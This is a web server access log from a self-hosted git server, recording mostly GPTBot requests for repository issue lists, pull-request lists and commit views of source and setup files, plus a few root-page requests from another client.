[Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" +[17/Feb/2026:19:16:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=source" [Client 74.7.227.38] [Length 15663] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:19:16:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=source" [Client 74.7.227.38] [Length 15636] [Gzip 6.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:19:16:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=source" [Client 74.7.227.38] [Length 15662] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:19:16:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=source" [Client 74.7.227.38] [Length 15663] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:19:16:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=source" [Client 74.7.227.38] [Length 15661] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:19:16:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:16:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:16:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:16:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" +[17/Feb/2026:19:16:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:16:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:16:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:16:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:16:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&state=open&type=all" +[17/Feb/2026:19:16:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&sort=latest&state=closed&type=all" +[17/Feb/2026:19:16:46 +0000] - - 301 - GET http git.hanmocnn.co.kr "/" [Client 157.245.110.238] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[17/Feb/2026:19:16:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:16:47 +0000] - - 301 - GET http git.hanmocnn.co.kr "/favicon.ico" [Client 157.245.110.238] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "http://git.hanmocnn.co.kr/" +[17/Feb/2026:19:16:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:16:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:16:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 157.245.110.238] [Length 5677] [Gzip 2.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[17/Feb/2026:19:16:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:16:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:16:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:16:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:16:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:16:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:16:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:16:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:16:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10061] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:16:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/favicon.svg" [Client 157.245.110.238] [Length 1040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/" +[17/Feb/2026:19:16:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:16:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11871] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:19:16:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:16:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:16:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:16:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:16:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:16:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:16:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:16:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=latest&state=all&type=all" +[17/Feb/2026:19:16:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=latest&state=all&type=all" +[17/Feb/2026:19:16:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:16:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt?display=rendered" [Client 74.7.227.38] [Length 11165] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:19:16:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt?display=rendered" [Client 74.7.227.38] [Length 11165] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:19:17:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt?display=rendered" [Client 74.7.227.38] [Length 11167] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:19:17:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt?display=source" [Client 74.7.227.38] [Length 15194] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:19:17:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt?display=source" [Client 74.7.227.38] [Length 15195] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:19:17:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt?display=source" [Client 74.7.227.38] [Length 15194] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:19:17:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt?display=rendered" [Client 74.7.227.38] [Length 11167] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 